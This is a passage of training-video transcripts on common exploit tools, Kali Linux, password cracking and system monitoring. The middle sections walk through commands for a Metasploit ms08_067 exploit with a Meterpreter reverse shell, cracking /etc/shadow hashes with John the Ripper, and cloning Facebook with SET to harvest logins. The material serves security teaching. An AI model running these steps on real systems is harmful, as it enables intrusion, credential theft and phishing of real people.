tunnel would be an acceptable mitigation. We should also be aware of configuration flaws. So depending on
how a tool or a piece of software is configured, it could lead to a vulnerability. In this video, we talked about
privilege escalation.
In this video, learn how to distinguish the difference between common exploit and tools.
Objectives
[Topic: Common Exploit Tools. The presenter is Dan Lachance.] In this video, we'll talk about Common
Exploit Tools. The first thing to consider is the fact that tools themselves are not malicious. Rather, it's how the
tools are used that can be malicious. There are plenty of freely available tools that can be used legitimately by
IT technicians to test the strength of their networks and hosts on those networks. But in the wrong hands those
same tools could be used to exploit vulnerabilities for purposes that are nefarious. Common Exploit Tools are
available for all platforms. So, Windows based as well as Unix and Linux based. In some cases some of the
exploit tools can even run on a mobile device. Some of the tools are for free and other tools are not. Some
common examples of tools include dsniff. dsniff is a suite of tools that are used for network auditing and
penetration testing where there is a focus on trying to sniff out network passwords. Webmitm, stands for web
man in the middle.
This is both a packet sniffing tool as well as a transparent proxy that can relay messages to another party, both
of which are required for a man in the middle attack. Nemesis is a packet creation and injection tool that allows
us to quickly and easily spoof any type of network packet. Aircrack-ng stands for next generation and it allows
us to crack Wi-Fi WEP, WPA, and WPA2 keys. Nessus is a widely used vulnerability scanner that will be able
to tell us what kind of vulnerabilities exist on hosts on the network or even on a single host if that's what we
chose to scan. Nmap is a widely used network scanner to map out what's on the network. Wireshark is a widely
used packet sniffer that is available for free on various platforms. Capturing network traffic with a packet
sniffer can be used to reveal things that shouldn't be on the network. In terms of hosts or protocols that are in
use or even in secure mechanisms being used over the network. In this video we talked about Common Exploit
Tools
During this video, you will learn how to use Metasploit tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Metasploit Suite of Tools. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to work with the Metasploit framework in Kali Linux. [The root@kali:/ command prompt
window is open. It displays the output of the following command: nmap -n -sV 192.168.1.242.] Metasploit is
essentially a tool that we can use for penetration testing so that we can perpetrate remote attacks over the
network against other hosts. And we do this by using specific exploits that are available within the framework
and payloads. Payloads are essentially chunks of code that we can run on a remote system. So the payloads are
designed to work together with an exploit. So currently I'm running an nmap scan on a host that I know is
running Windows XP. Now, the reality is, of course, you would have to scan the network to see if there was
anything that looked vulnerable in the first place before you knew exactly which exploit and payload to use
against that host. So what I'm looking for here is port 445. Now, if we take a look at the Windows XP
target [The screen switches to cmd.exe command prompt window.] and run netstat -an, we can see indeed that
port 445 is actually open, and it's in the listening state. This is a scary problem, we never want this for a
machine that's exposed, especially to the internet. So what now? [The screen switches back to root@kali:/
command prompt window.] Well, we're going to clear the screen, and we're going to type, msfconsole to get
into the Metasploit Framework command line console. This is going to make all of the exploits and payloads
that we need to pair together available for us. Allowing us also to set some variables, like the IP address of the
remote host, so that we can run the exploit against it. Now that we're in the msf interactive prompt, the first
thing we can do is type show exploits to get an idea of how many of these exploits are actually there. So you
need to have a sense of which exploit you want to use, and that can be done with some very basic searching or
through experience in using the Metasploit framework.
So we can see the list that has scrolled by of various exploits that are available, and especially related to
Windows and VNC and client buffer overflows and so on. At the same time, we can also type, show payloads
to see the payloads that are available that we would pair with those exploits. And remember that payloads are
essentially pieces of code that we actually would end up running on a remote system when we exploit it. So we
have a list here available as well. So what we're going to do in this case is, we're going to type use exploits/.
And in our example we want to take advantage of port 445, which is the SMB, or Server Message Block port
that we saw was available on that host. So we're going to use exploit/windows/smb. And with a bit of research,
we can figure out exactly which exploit we need to use, which I've already gone and done. So I'm going to go
ahead and enter it here, and I'll press Enter. [Dan executes the following command: use
exploits/windows/smb/ms08_067_netapi. The prompt changes to msf exploit(ms08_067_netapi).] And it puts
me in to that exploit, so I'm ready to work with it. So for that exploit, I'm going to set the remote host variable
RHOST to the IP of the target, which in this case is 192.168.1.242. Now, I know that because the nmap scan
revealed that it had port 445 open. Okay, so now that that's done, I'm going to set the appropriate payload to
pair with that exploit. So set payload, again, this requires a bit of research ahead of time, unless you're used to
using these all the time already. So I'm going to put in the path for that, I'm going to use reverse_tcp. [He
executes the following command: set payload windows/meterpreter/reverse_tcp.]
And now that I've already set my remote host variable RHOST, I'm going to have to set my local host or
LHOST variable, which is going to be the IP address of the machine where I'm running this. Where I want any
return traffic to come back to. So I'm going to say set LHOST 192.168.1.91. That is the IP address of this
Linux host. I'm going to set a port too, so set LPORT, let's say, 1234. And now I'm going to run the exploit by
typing in exploit. The thing to be careful of with this is to be patient. So depending on your network and the
type of exploit you're trying to run, it may take longer than you might expect before you get a response back.
So just be patient, we're going to go ahead and wait a minute and then see what happens. Okay, so it worked.
We can now see it detected that it was a Windows XP machine and it opened up a Meterpreter session. So this
is good news from the sense of being able to successfully exploit port 445 on that host. So now if I were to
type ipconfig, it's actually running on that remote machine. Also, if I were to type shell, it's going to give me a
remote Windows shell, even though I'm here in Linux running the Metasploit framework.
So from here, I can do pretty much whatever I please on that Windows host. [He executes the dir command.] I
can get files there, delete files, poke around, and so on. In this video, we took a look at how to work with the
Metasploit framework.
Learn how to use Kali Linux tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Kali Linux Suite of Tools. The presenter is Dan Lachance.] In this video, we'll take a
look at Kali Linux. [The Kali Linux Downloads page of the www.kali.org web site is open. Running along the
top of the page are six tabs, which are Blog, Downloads, Training, Documentation, Community, and About
Us. The Downloads tab is selected by default. The page also includes a Download Kali Linux Images section
that lists various Kali Linux images with their size and version.] Kali Linux is a free downloadable distribution
of Linux with hundreds of security tools built in. It stems from the older BackTrack auditor which previous to
that was the Linux auditor, although those projects have since been discontinued. Here on the kali.org
webpage, we have the option of downloading ISO images for Kali Linux, whether it's 64 or 32-bit. And you
can run it right from the ISO, even by burning it to a DVD. When you boot up you even have the option of
installing it on a local hard disk. With most versions of Kali Linux, you log in as user root, R-O-O-T, and the
password is T-O-O-R, in other words, root backwards. So, once we're into Kali Linux, we have a GUI
environment. [The Kali Linux GUI is open on screen. Running along the top is a menu bar with Applications
and Places drop-down menus. The taskbar is present on the left-hand side of the screen.] Although, when you
boot up, you do have numerous options to choose from. Here I've selected the default, which takes me into the
GUI mode. From the Applications menu up in the upper left, we can go through all the different categories of
tools, such as Information Gathering, or Reconnaissance Tools. [Dan clicks the Applications menu. A drop-
down list appears that has various options such as Information Gathering, Vulnerability Analysis, and so on.
He points to the Information Gathering option and a flyout menu appears that has various options such as
dmitry, nmap, sparta, and so on.]
So we can see for instance over, there we've got options like nmap and even the graphical sparta tool, which
can use other things in the background like nmap to do discovery of devices on the network. We've got
Vulnerability Analysis where we've got tools available. Web Application Analysis, Database Assessment
Tools, even Password Attacks such as the John the Ripper tool. We've got Wireless Attacks so that we can
crack into WEP, WPA, or even WPA2 protected wi-fi networks. We've also got a number of Exploitation
Tools such as the Metasploit framework, and the social engineering toolkit or SE toolkit. In the Sniffing and
Spoofing section we've got the standard options like Wireshark for packet sniffing. We've also got interesting
tools like driftnet, which allow us to view images that others are viewing on the network, literally, as in
pictures. There are other Forensics tools available here. We've also got some Reporting Tools, and then we've
got the Usual Applications of course that are available in any Linux distribution. In the left hand bar we can
also start a Terminal shell [He clicks the Terminal icon from the toolbar to open the root@kali:~ terminal.] if
we want to do stuff at the command line. Now some of the tools available in Kali Linux are graphical based,
whereas others are entirely done at the command line. In this video we learned about Kali Linux.
crack passwords
[Topic: Password Cracking. The presenter is Dan Lachance.] In this video, I'll demonstrate how to crack
passwords. [The root@kali:~ command prompt is open.] Password cracking can be done using many different
techniques, from social engineering, where we trick someone that's unsuspecting into divulging their password.
Or we might use some kind of brute-forcing tool like John the Ripper, which we'll examine here, which can
take a list of possible passwords and apply it against an account until it gets a match. Or we might use some
kind of other tool where we go to spoofing of an entire website. Where we fool people into going to this
website to put in their credentials and we have an easy way to get passwords that way as well. We could even
use tools that would look at the resultant hash of a password and reverse-engineer it mathematically to try to
derive the originating password. So there are many ways to do it. Let's start here in Kali Linux by using the
command useradd to create a user called jdoe. [Dan executes the following command: useradd jdoe.] We'll
then use the passwd or password command to set a password for that account. [He executes the following
command: passwd jdoe. He is prompted to Enter new UNIX password.] This is the account that we're going to
try to brute force using the John the Ripper tool included in Kali Linux. [He is prompted to Retype new UNIX
password, which is then updated successfully.] Now if I cat the /etc/passwd file and grep it for jdoe, [He
executes the following command: cat /etc/passwd | grep jdoe.] then we're going to see our newly created user.
However, we don't see the password and that's because the password is in the shadow file. Let's bring up that
previous command but let's just change the file name from passwd to shadow. [He executes the following
command: cat /etc/shadow | grep jdoe.] Okay, now we can see user jdoe and then after that we see a colon
which is the delimiter for all the different items in this file, followed by this long password hash.
We're going to use the unshadow command to put the contents of these two files together for ease of trying to
crack the password. So I'm going to type unshadow /etc/passwd /etc/shadow and then we're going to give it an
output redirection symbol. I want this to be called password_files. Okay, now why don't we take a look here.
Let's use the vi command and go into /usr/share/john because we're going to use John the Ripper tool. I want to
take a look at the password list file that's supplied here. Of course, it could be modified, you could use
different languages, different types of terms like legal or medical terms. [He executes the following command:
vi /usr/share/john/password.lst.] So here, for instance, notice I've added the first entry here of, Pa$$w0rd in
variation. That is actually what I set is the jdoe password. Now it's not always going to be as simple as brute
forcing with a list of passwords and cracking the password. Sometimes it works, other times it doesn't. But the
nice thing about using a tool like John the Ripper is that it automates the attempts. You don't have to try it
manually. Bear in mind, if you use some kind of a brute force tool like this, it could actually lock out the
account, if intruder detection has been enabled. You know, maybe for example after three incorrect login
attempts, one after another, the account's locked for a day.
That is possible. However, as we go through this password list file, we've got all kinds of different words,
common words that are commonly used as passwords like 123abc, so we could modify this. There are plenty
of them that you could go ahead and download here as well. Just be careful if you see any of the more
offensive items in this password file but the reality is you're going to see some of those things out there. Okay,
let's get out of here. So I'm going to type :q for quit to get out of vi, or VI, the text editor. [The screen goes
back to the command prompt.] And now what we're going to do is actually go ahead and attempt to crack a
password. So I'm going to type in john, because that's the command to run the John the Ripper Password
cracking tool. --wordlist=/usr/share/john and we just looked at the file, it's called password.lst. So here we go,
password.lst, and then I'm going to give it our combination of our /etc password and shadow files which were
called password_files. I'm going to go ahead and press Enter [He executes the following command: john --
wordlist=/usr/share/john/password.lst password_files.] and we can see it's currently doing its work. So,
depending on how many passwords you have in your list files and so on will determine how long will it take.
Now, we've set up this example so it would be very simple and quick and we can see immediately the
password for user jdoe. So it's done that and it's associated with user jdoe by looking at the hash in that file. So
once this is complete, then we're ready to go. I'm going to interrupt this with Ctrl+C because we've got what
we need. Now you can also use the john command with --show and ask it to show any passwords that it's
determined already. [He executes the john --show passwords command.]
So here it tells me that the password for jdoe is, well, the variation of the word password. Although in the file,
it's a hash of it, isn't it? It's not the actual password, but here it's displaying the actual password that we could
actually use to log in as that user. Now, that's one type of way of cracking passwords. You can brute-force it,
not always effective, it also might end up locking accounts. However, it can be useful in some cases. Now,
another way that we can work with this is by essentially mimicking common websites that people would
frequent and spoofing the whole website. Basically setting up our own fake web server like for Facebook,
which we'll do in this example. Here in Kali Linux, I'm going to type setoolkit which stands for social
engineering toolkit. I'm going to go ahead and press Enter and now notice I'm in a different interactive prompt
that has SET for Social Engineering Toolkit. [The screen prompts to select from the listed menu options such
as: 1) Social-Engineering Attacks, 2) Fast-Track Penetration Testing, and so on.] So what I want to do then is
I want to start the Social Engineering Toolkit, so I'm going to go ahead and press number 1 for Social
Engineering attacks. [The screen again prompts to select from the listed menu options such as 1) Spear-
Phishing Attack Vectors, 2) Website Attack Vectors, and so on.] What I'm interested in then doing is a website
attack vectors, so number 2. [The screen now displays the another set of menu options such as 1) Java Applet
Attack Method, @0 Metasploit Browser Exploit Method, 3) Credential Harvester Attack Method, and so
on.] The next thing I want to do is credential harvesting, so I'll press number 3. [The screen again displays
menu options such as 1) Web Templates, 2) Site Cloner, and so on.] I want to clone a website so I'll press
number 2. And it wants me to pop in the IP address for my Kali Linux machine, not the website. So here I'm
going to pop in 192.168.1.91. Then it says putting the URL for the site that you want to clone. I'm going to put
in www.facebook.com. Looks like I put that in incorrectly, so I'm going to have to try that again.
Let's try that again. Site cloner, put in my local IP address, it helps when you type things in correctly. So let's
try this again, www.facebook.com. Now what it's doing is cloning the website so that it will actually be
running on that machine, it looks like the real deal. So you can see here in a web browser, [The screen
switches to a web browser. The http://192.168.1.91/ address is present in the address bar of the browser. It
displays the Facebook login page, which includes fields for username and password, and a Log In button.] if I
actually connect to my Kali Linux installation, it actually looks like the real Facebook site. So of course, what
this would require is to redirect users to this IP address, which could be done by compromising their system
and editing the hosts file or maybe making an entry in a DNS server that you've compromised. So here, I've put
in the name and the password, I'll go ahead and click Log In. Interestingly, the user actually gets redirected to
the real page, [The Facebook login page opens which has the following web address:
https://www.facebook.com/login.php.] so therefore what's interesting here is it's kind of stealth, the user doesn't
even know what's happening. Let's go back and check Linux. So back here in Linux, I'm going to go ahead and
type 99 to return back to the main menu. And then of course, I'm going to finally exit this entire tool. The next
thing to do to review the results is to go into the /var/www/html folder. [The screen switches to Kali
terminal.] And if you do an ls, you'll see a harvester file there. If you cat that file to view its contents and
perhaps pipe it to more, in case it's really long, [He executes the following command: cat harvester_2016-09-
16\ 11\:07\:02.664969.txt | more.] then you're going to start seeing some interesting information. Here I can
see [email protected], and I can see the entered password. Now remember that user doesn't really suspect that
that was a fake login page. They were redirected to the real thing and successfully got into Facebook. So, here
we have an easy way essentially of tricking people into divulging passwords. So, it's important, then, to make
sure that people's machines can't be compromised so host file entries can't redirect them to fraudulent sites and
that DNS servers are hardened so that they can't be compromised. In this video, we learned how to crack
passwords.
Table of Contents
After completing this video, you will be able to recognize the importance of continuous monitoring of various
systems.
Objectives
[Topic: Reasons for Monitoring. The presenter is Dan Lachance.] In this video, I'll talk about reasons for
monitoring. In order to effectively manage and maintain a network environment and all of the hosts and
applications it consists of. We need to be constantly monitoring all aspects of the network to ensure that
everything is performing well. And also to insure that our security controls are effective in protecting assets.
So with monitoring, we can identify changes that might have occurred that can change the security impact of a
system. So for example, if we've got remote desktop being enabled on a server, we might want a notification to
that effect. Because maybe we don't use remote desktop in our environment. Instead, we use remote
management tools from a client, to get to the Windows server. So, monitoring can also bring to light poorly
designed controls, that even might have been effective at one point in time, but are ineffective currently. So
monitoring provides ongoing oversight as to what's happening on the network and to its hosts. And to the
applications used by and running on those hosts. At the auditing level, this only works correctly if everybody is
using a separate user account when they perform network activities. Whether they're an end user or an IT
technician creating user accounts.
Transactions can also be inspected in the case of database applications, so that we can track exactly what's
happening, with the correct date and time source. And who started the action, or which device, or which
application, started the action. Monitoring can also be tweaked to focus on cyber defense. Where we can
monitor our network infrastructure, which includes devices like routers, switches, wireless access points, VPN
appliances. Now there are many ways that these can be monitored. The old standard that's been used for
decades is SNMP, the Simple Network Management Protocol, where, from a central management station, we
can reach out over the network to these SNMP compliant devices. And basically, poke and prod any statistics
that they might make available through SNMP. In some cases, we might even be able to reconfigure those
devices through SNMP. Now of course, monitoring can also apply to all of our user devices, and also servers.
We might even install an agent on those operating systems to report back detailed information periodically.
Security information and event management, or SIEM, is a standard in the IT industry.
It's a monitoring standard that's used to detect anomalies. And then to prioritize incidents and then to manage
those incidents. Now, just as is the case with a raw intrusion detection or prevention system, often, SIEM
systems need to be tweaked for a specific environment. Due to legal or regulatory reasons, we might not have a
choice but to monitor our network or specific applications. Or to set triggers for certain types of transactions
that occur, such as high-volume financial transactions. In the cloud, there is something known as CMaaS,
which stands for continuous monitoring as a service. So instead of having an on-premises continuous
monitoring solution running on our equipment, it can be run through the cloud. Monitoring is also beneficial in
the sense that it can show us areas where there are inefficiencies, where we can optimize performance. Either
of the network as a whole, or individual hosts or processes within applications. So we can ensure also that
network and systems are used properly and only by authorized users. In this video, we discussed the reasons
for monitoring.
During this video, you will learn how to distinguish the difference between common monitoring tools.
Objectives
[Topic: Common Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll talk about Common
Monitoring Tools. Of the many monitoring tools available for IT networks and hosts, they share many
common features. Some monitoring tools are real-time, where they are constantly watching for certain types of
changes and they can alert or even do something about it immediately. And in some cases, this type of real-
time monitoring solution requires an agent to be installed. If this is possible, such as on an operating system.
Monitoring tools can also do a historic analysis of data to determine, for example, if there are anomalies or
times that are missing from log files. All monitoring tools should have the ability to have configurable
notifications, whether we are notifying technicians through SMS text messages, through email and so on. In
some cases, monitoring tools will also have the built-in capability of auto remediation. Where, when
something is detected, it automatically gets fixed. So, for example, if our monitoring system detects that the
Windows firewall is not enabled on a laptop, it can automatically turn it on for additional security. But in order
for that to work, there would need to be some kind of software agent running on the Windows machine. And
that's exactly what happens when we use things like network access protection in Windows environments.
There is a client-side agent or service running that allows that to be possible. Log files can be monitored
whether we're looking at the Windows environment or UNIX and Linux. In Windows, there are a numerous
event viewer logs. For the operating system, for products like PowerShell, Internet Explorer, DNS, TCP, group
policy, the list goes on and on and on. Now the reality is, we probably don't a have time to pore over all of
these logs on each and every Windows host.
So it can be configured such that when we view a log, it is filtered. We can even build a custom view log
where we only display things that are of interest, such as warnings or critical errors and so on. The same type
of thing is possible with UNIX and Linux. Now, in UNIX and Linux, log files for most software, exists
under /var/log. Here on a Windows Server 2012 machine, I've gone into the Windows Event Viewer and I'm
looking at the standard Windows System log. [The Event Viewer window is open. Running along the top is a
menu bar with menus like File and Action. Below that is a toolbar with various icons like back and forward
arrows. The rest of the screen is divided into four parts. The first part lists the folders of the Event viewer such
as Custom Views and Windows Logs. The Windows logs folder is expanded and it has various options such as
Application, System, and so on. The System option is selected by default. The second part displays the contents
of the option selected in the first part. It lists the events in the system in a tabular format. The table headers
are Level, Date and Time, Source, Event ID, and Task Category. The third part displays the details of the
event selected in the second part. The fourth part is titled Action and it lists the available actions for the
system and the selected event.] Well, we can see there are logs that have a level of error, information, warning
and so on. Now one of the things that we could do here is we could sort, for example, by Level. [Dan clicks
the Level table header in the second part.] So, this way we have the ability to essentially group together all of
the errors, all of the informational messages, and all the warnings. Although they won't be in chronological
order any longer. But another option is to build a Custom View. Over on the left, if I were to expand Custom
Views, I could then right-click and choose Create Custom View. [from the shortcut menu. The Create Custom
View dialog box opens. It contains two tabs, Filter and XML. The Filter tab is preselected, which displays
various filters to select from.] Now, here what I might do is build a Custom View that shows me only Error,
Critical, and Warning messages. But I can get even more detailed with my filtering because I can do it by
specific logs. So, here for instance, under Windows Logs, I'll just choose the System log. And perhaps down
under Applications and Services Logs, I'll choose Microsoft > Windows, and I'm just going to keep going
down here. And maybe for this example I'll choose GroupPolicy. So now I'm asking for Critical, Warning and
Error log entries from those specific logs. I can also specify specific event ID numbers, which indicate a
certain type of event has occurred, or I can use keywords, or do it by user or computer. But for now, I'm just
going to click OK, [The Save Filter to Custom View dialog box opens. It includes text fields for Name,
Description, and buttons such as Ok and Cancel.] and I'm going to call this Nothing But Trouble. And then I'll
click OK. So we now have a Nothing But Trouble custom log view.
And we can see over on the right, that it's filtered out, the only thing we're really seeing are Errors, Warnings
and so on. To take that a step further, I could even right-click onto my custom view listed in the left-hand
navigator. [He right-clicks the Nothing But Trouble custom view and a shortcut menu appears. It lists various
options such as Open Saved Log, Create Custom View, Attach, Task To This Custom View, and so on.] And
what I can do is attach a task to that view. [He selects the Attach Task To This Custom View option and the
Create Basic Task Wizard opens.] Essentially, as I go through this wizard, I could then determine exactly what
it is that I want to do. Maybe start a program, send an e-mail message or display a message. So basically, we
can trigger something to happen when we get a new log entry in this specific custom view. [He cancels out of
the wizard.] Now at the enterprise, large scale level, you'd probably be using some kind of a SIEM solution,
which gives you many more capabilities. But in some cases, some of these options built into the operating
system can actually be very useful. As we mentioned, we might use a SIEM, a security information and event
management solution, to monitor activity on the network and devices and applications, even in real-time. So
we can monitor data, looking for threats, and SIEM solutions even have the ability to contain and manage
incidents as they occur. Of course, we've got the standard and raw.
And the reason I say raw is because, you know, a SIEM solution could include intrusion detection and
prevention. But outside of a SIEM solution, we have these raw individual capabilities. So, including intrusion
detection systems or IDSs, which can be host-based or network-based. Intrusion detection systems can detect
anomalies and report on them or send notifications, but they don't do anything about it. Whereas, intrusion
prevention systems, be they host or network-based, not only detect anomalies and send alert to notifications or
write that information to logs. But they also can be configured to take actions to prevent the intrusion from
further completing. Supervisory control and data acquisition is often referred to as SCADA. This is a
monitoring tool set that is used in industrial environments. So, similar to SIEM, it has the ability to monitor all
aspects of the network or industrial equipment and then reporting on it in real-time. In this video, we talked
about Common Monitoring Tools.
In this video, you will learn how to monitor the Linux operating system.
Objectives
[Topic: Linus OS Monitoring Tools. The presenter is Dan Lachance.] Linux and Unix operating systems
certainly allow us to do things from the command line but also in some cases with GUI interfaces. In this video
we'll explore Linux command line OS monitoring tools. [The root@kali:~ command prompt is open.] There
are plenty of tools built into Linux that we can use to monitor various aspects of the system. The first one we'll
take a look at here is top. Now remember that Linux commands are case sensitive. So where I'm typing this in
a lowercase letters, actually matters. Now when I type in top and press Enter, I get a list of running processes
where the top users of things like CPU utilization are listed at the top of the list. And the ones that are putting
the least amount of load on the percent CPU utilization are listed further down the list.
So notably we can see the PID in the leftmost column, the process ID, followed by the USER that spawned
that process. Now in some cases the system itself will spawn processes. Further over to the right, we can see
the percent of CPU utilization and percent memory being consumed by a given running process along with the
actual command itself, listed in the rightmost column. There are also some statistics up at the top, like how
long the system has been up and running, how many users are connected, the load averages over the last
periods of time. It tells me that there are 207 tasks running in total and so on. But we can interact with this
while we're working with it. For example, if I press the letter d, I get asked to change the delay from the screen
output from this command from three seconds to something else. Maybe I'll type 0.5 and press Enter. And we
can immediately see that our update is much more frequent. I'm going to press d and we're going to go back to
every three seconds. So I'll type in 3 and press Enter.
But there are other great things we can do here in top as well. For instance, maybe we don't want to seen all of
these columns of information. We're only interested in a few. So how do we filter them out? If I press the letter
f, and of course I'm not holding Shift, so it's not an uppercase F, it's just a regular lowercase f, it takes me into
this screen where I can manage fields. So f for fields. In the left-hand column we can see whether or not there's
an asterisk next to a field name. And if there is an asterisk, it's currently being displayed. So basically, if you
use the arrow keys to move up and down and you can toggle the display of a field on and off by using your
space bar. So if I hit the space bar for a bunch of these fields I don't want to see, then the asterisk is removed,
which means that they will not appear in the screen output. And maybe I want to sort by something other than
CPU utilization, maybe by %MEM for memory. So I'll go down with my arrow keys and highlight that one,
and then what I can do is press the letter s to sort by that. Now you might say, nothing changed on the screen,
when in fact it did, if you look in the upper right. It says the current sort field is %MEM. You see, if I highlight
%CPU and press s, now up in the upper right it says current field that is being sorted is %CPU. So I'm going to
go back and sort it by memory.
Now that I'm happy with this I'll press the letter q for quit. And we're back in the top command, where we still
have a live updating changing screen every three seconds. However, we're missing some columns and now it's
sorted by percent memory instead of percent CPU. So I'm going to go ahead and press q to quit out of here. In
Unix and Linux we have manual or man pages which are help pages for Linux commands. So maybe I want to
know more about how to use the top command, maybe in batch mode where I can start writing things to files
instead of having to babysit it in real time while I watch it on the screen. So for instance, if I were to type man
space top, it opens up the man page for the top command and as I go further down, I'll just press on the Enter
key here. As I go further down through this man page, I can see all of the different ways that this command is
designed to work. And eventually, as I go further down, I'll see the various command line switches such as -b
to run in batch mode. Now the idea here is, batch mode can send output for instance to a file, so we can
examine our monitoring to a file instead of having to view it in real time. So I'm going to go ahead and press q
to get out of that man page. Now some other interesting commands in Linux and there are plenty of them,
includes things like the ps command to list processes. When I type ps with no parameters it only shows me the
running processes in this current session. So we've got our bash Linux shell, which is allowing us to type
things in the first place.
And of course at the time it was executing, ps was executing, so it shows up as well. We can also see the
process ID assigned to each of these processes in the leftmost column. However, things get interesting if I start
using command line switches like aux to view all processes, including user processes and the x is for,
processes aren't tied to a terminal, that means things that are started up by the system. [Dan executes the
following command: ps aux.] So if I do that I get a very big output. Now of course, I use the up arrow key to
bring that back. I could pipe that using my vertical pipe symbol, which I get by shifting the backslash key. I
can pipe that to more to stop after the first screen full. [He executes the following command: ps aux |
more.] This way I can see the column headings at the top. So from the left we've got the user column followed
by the process identifier %CPU, %MEM and so on. In the Unix and Linux, we could also pipe the result of a
command like ps aux to grep where we might filter for something specific. Here, I want to get information
about the running process called sshd, the ssh daemon which allows remote command line administration. [He
executes the following command: ps aux | grep sshd.] And in this case I can see that I've got a couple of
entries, ignore the last one which of course is us grepping for sshd in the first place. But I do see the first listing
here where it's referencing my ssh daemon which is running on this host. So if we want to, we can filter those
types of things out. Also in Linux, other interesting things we can do, for instance, at the disk level, is we
might use df or disk free. [He executes the df command. The output appears in a tabular format with the
following table headers: Filesystem, 1K-blocks, Used, Available, Use%, and Mounted on.] Now what I might
want to do, instead of doing this in 1k blocks is use df -h for human readable. [The output now contains a Size
column instead of the 1K-blocks column.]
Then instead, it's a little bit more readable, where I'm reading the megabytes or technically the mebabytes. And
the difference really is that a megabyte is 1000 kilobytes, where a mebabyte, and yes, that's what I said,
mebabyte, is actually 1024 kilobytes. So there is a little bit of a difference in how some Linux distributions will
display things. And technically, a mebabyte is not exactly the same thing as a megabyte. Other things I might
be interested in using for monitoring here built into most Unix and Linux distros is the tcpdump command.
This one is really cool because it's kind of like having a built in command line packet sniffer and it's been there
for decades. For instance, if I type tcpdump -i for interface, now that's a lower case i, remember case
sensitivity is important. I'll give it the name of my interface which I know is eth0. If you're not sure, you can
type ifconfig on your Unix or Linux host. I just press Enter, it's capturing everything and it's scrolling by very
quickly. So I'm going to interrupt that by pressing Ctrl+C and I'll type clear to clear my screen. I'll use the up
arrow to bring up tcpdump command. What I want to do here is capture traffic destined for a specific host. So
I'll put in the IP address here, where it's going to port 22.
So dst for destination followed by a space and the destination IP. Then after that we've got a space, the word
and, a space, the word port, and a space and 22. So I only want to capture stuff going to that IP address,
specifically to port 22. And I can also pass a -A to view everything in ASCII form instead of hex. [He executes
the following command: tcpdump -i eth0 dst 192.168.1.91 and port 22 -A.] So now we can see ssh traffic that
applies to that specific type of connection that we asked for, I'll press Ctrl+C to interrupt them. Last thing we'll
mention about tcpdump is you may want to write that stuff to a file. So I'll just bring up our previous
command, and I'll add another switch after a space. What I'm gonna add is a -w, which means write, and I'm
going to put that in a file called, let's see, capture1.cap. [He executes the following command: tcpdump -i eth0
dst 192.168.1.91 and port 22 -A -w capture1.cap.] Okay, so now I can see tcpdump is listening, normally we
would see in this case ssh traffic, we're not seeing it because instead it's being redirected to our .cap file. This
can be useful because you could let this run for a period of time, you can even schedule it as a cron job in Unix
or Linux, and then review the reports of what's been captured at some point in the future. We're going to go
ahead and press Ctrl+C to stop the capture, it tells me a few packets were captured. Finally I can use tcpdump -
r to read in that file capture1.cap. [He executes the following command: tcpdump -r capture1.cap.] And there's
the data that was captured. In this video we talked about Linux OS monitoring tools.
In this video, you will learn how to monitor the Windows OS.
Objectives
[Topic: Windows OS Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with Windows OS monitoring tools. Much like Unix and Linux operating systems, the Windows
operating systems, both client and server-based, contain a number of great built-in monitoring tools. Here in
Server 2012 R2, let's start by going to our Start menu and typing in perf, P-E-R-F, so that we can start up the
Windows Performance Monitor tool. The Performance Monitor tool has been built into the OS for quite a long
time, and it's still as useful as it was from day one. [The Performance Monitor tool window opens. Running
along the top is a menus bar with various menus such as File, Action, and so on. Below that is a toolbar with
various icons such as back and forward arrow. The rest of the window is divided into two parts. The first part
is the navigation pane that has a root folder named Performance. The root folder is selected by default. Below
that are three expandable folders, namely Monitoring Tools, Data Collector Sets, and Reports. The
Monitoring Tools folder is expanded and it lists the Performance Monitor option. The second part displays the
contents of the option selected in the first part. The second part is divided into two sections, Overview of
Performance Monitor and System Summary.] So I'm going to click on the Performance Monitor in the left-
hand navigator, [The second part of the window is now divided into two sections. The first section has a
toolbar at the top with various icons such as plus, pause, and so on. It also displays a real-time graph of
percent Processor Time. The second section displays a table with following table headers: Show, Color, Scale,
Counter, Instance, Parent, Object, and Computer. The table lists the processes for which the graph appears in
the first section.] where by default, we've got a real-time graph that shows us the percent processor time in
total for all processor cores. Now I could click the green plus sign at the top of this tool, [Dan clicks the plus
icon from the toolbar. The Add Counters dialog box opens. It is divided into two sections that are Available
counters and Added counters.] where I can add additional performance counter metrics that I want to monitor.
They're all categorized here alphabetically. And this list is coming from the local computer, although I could
browse the network for other remote computers and monitor them remotely. Now depending on what's
installed on the local server will determine which categories we have here, some are here no matter what. For
instance, if we're working with IPv4, well, you're always going to have that here. But depending on whether
you've installed other server rules like DNS or DHCP or SQL Server, for instance, would determine the
additional counters that you might actually see in this list. So I'm going to scroll down here to the P's, where
what I want to look for is Physical Disk.
And I'll expand that category and you can see, when you do that, you see the individual performance counter
metrics listed underneath. So I think what I'll do here is just look at the average disk queue length, which is an
indication of how many requests for disk I/O are queued up because the disk subsystem is already too busy.
Now, you need a baseline of normal activity before you can hit the panic button. Just because you've got some
value in, for instance, the average disk queue length, it will vary from one environment to another. Naturally,
in a busy disk I/O environment on a file server, you can expect higher values in the average disk queue length
than on a server that is not a file server, maybe it's just a DHCP server. So I'm going to choose that for all disk
instances, but notice I could chose a specific disk instance. So I'll choose All instances, I'll click Add, which
adds it over on the right [to the Added counters section.] and I'll click OK. [The dialog box closes and the
screen goes back to the Performance Monitor window.] And now it's been added down here, [The average
Disk Queue Length for the available physical disks are now listed in the table along with the percent
Processor Time.] we've got the average disk queue length, in total, but also we've got the individual disk
queue lengths. For the total one, I'm going to double-click on it, [The Performance Monitor Properties dialog
box opens. It included various tabs such as General and Data. The Data tab is selected by default. It includes
drop-down list boxes for Color, Scale, Width, and Style. There are also three buttons at the bottom of the
dialog box, namely OK, Cancel, and Apply.] where I can change things like the color and the width of that
specific line as it gets written to the graph. [He changes the color and width of the graph line from their
respective drop-down lists.] And we can see it listed here now a little bit more clearly at the bottom. Naturally,
as we have more disk I/O activity, we can expect that thick green bar for the average disk queue length in total
to start spiking periodically. And just because you've got a spike in a graph doesn't mean that there's
necessarily a problem.
